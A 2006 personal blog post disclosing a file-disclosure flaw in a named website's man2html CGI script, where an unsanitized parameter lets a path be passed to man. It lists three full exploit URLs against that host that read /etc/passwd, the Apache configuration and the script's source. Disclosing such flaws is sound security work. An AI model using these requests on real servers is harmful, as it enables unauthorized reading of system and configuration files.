Seth Woolley's Blog

Occasional Musings

Sat Jun 17 15:13:54 2006 -- another man viewer dumb

another man viewer dumb(0)

Synopsis

http://node1.yo-linux.com/cgi-bin/man2html?cgi_command=man

Read the paragraph that reads: 

        However,  if  name  contains  a slash (/) then man
interprets it as a file specification, so that you can  do
man ./foo.5 or even man /cd/foo/bar.1.gz.

Description

http://node1.yo-linux.com/cgi-bin/man2html?cgi_command=/etc/passwd

http://node1.yo-linux.com/cgi-bin/man2html?cgi_command=/etc/httpd/conf/httpd.conf

http://node1.yo-linux.com/cgi-bin/man2html?cgi_command=/var/www/cgi-bin/man2html

Looks like there was an attempt to sanitize cgi_section but not cgi_command -- also looks like it was hacked a bit and the sanitation may have been there, but removed later.

Sat Jun 17 15:13:54 2006Seth Woolley's Blog webdevel security

Leave A Comment

Secret is used for editing your own comment. If subject, secret, and name all are the same as a previous comment, it will be overwritten. Turing is the name of this program (look at the Source Code link on the front page), used to see if you are human.

[ Show All | References ( All ) | Search | RDF RSS 1.0 Feed ( Raw ) | Last Blog Image (PNG) (JPEG) | Browse Archive | Browse Comments | Browse Categories | XHTML 1.1 Valid | RSS 1.0 Valid | CSS Level 3 Valid | CSS File | PERL Source Code ]

user, system, child user, child system: 0.03, 0, 0, 0 seconds